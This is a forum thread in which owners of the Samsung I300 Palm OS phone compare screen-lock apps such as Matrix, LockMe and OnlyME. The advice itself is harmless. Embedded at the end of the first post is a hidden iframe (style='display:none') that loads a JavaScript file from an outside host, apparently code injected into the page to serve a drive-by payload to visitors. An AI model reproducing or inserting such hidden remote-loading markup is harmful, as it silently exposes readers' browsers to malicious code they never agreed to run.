Thumbs up Solutions for your problems with the Security of the I300

Ok, I been seeing that a lot of guys here have a problem with an easy security access for your I300. I am an owner of the Q-6035, and looking forward to get an I-300 (when they get cheaper when the Treo shows up). But I've been using this program called Matrix ( On PalmGear ), this program is

FREE
Easy to use and easy to operate
It makes your palm look EXTREMELY COOL, (especially if you are a Matrix fan)
It comes with the Hackmaster extension so it will launch itself at a preset time and It uses a series of the 4 button combinations, (does not require you to enter text or number on the system).
I think (and I hope) that this should work on your phones (because I hope it will work on mine when I get it), in any case, let me know what are your experiences <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I had tried a freeware ap called LockMe (I believe). This program could trigger the locking function on a Palm at any given time (among other options). When I loaded it on the I300 it appeared to function correctly. The only problem was that it did not trigger the locking function on the I300. My conclusion was that Samsung had altered the security features in some way that the normal API that 3rd-party software would use for security does not function. So, if Matrix uses any of the Palm-OS security functions I would not expect it to work either.

I use a program called OnlyME, it does require registration but IMHO it is worth the $9.95 that it costs. It has all the wonderful features like setting an image to the backdrop (either download or capture right off the pilot screen) and lock delay, incase you didn't really mean to turn it off just yet. It too uses the buttons for password entry. The feature I like most is that it allows application pop-ups, so when someone calls, the “answer” pop-up is allowed to function, letting me answer the call without unlocking it and my meeting reminders are displayed regardless of being locked or not. Check it out at http://www.tranzoa.com:)
